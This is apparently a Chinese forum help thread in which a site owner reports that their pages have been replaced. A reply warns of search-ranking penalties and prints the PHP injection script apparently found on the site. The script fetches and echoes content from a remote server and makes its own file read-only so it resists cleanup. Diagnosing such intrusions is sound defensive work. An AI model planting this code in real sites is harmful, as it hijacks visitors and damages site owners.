帮忙看看这个网站问题 怎么页面不是我的页面
www.xinruiqipei.com 帮忙看看这个网站问题 怎么页面不是我的页面[?] 好像被入侵了,重新生成index.html 也不行
12 人参与回答
这个得加快处理,时间久了会造成降权和K站的
<?PHP
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$TD_server = "";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
$url1 = $_SERVER['PHP_SELF'];
$filename1 = @end(explode('/',$url1));
function set_writeable($file_name)
{
@chmod($file_name,0444);
}
set_writeable($filename1);
cache_end($dir);
?>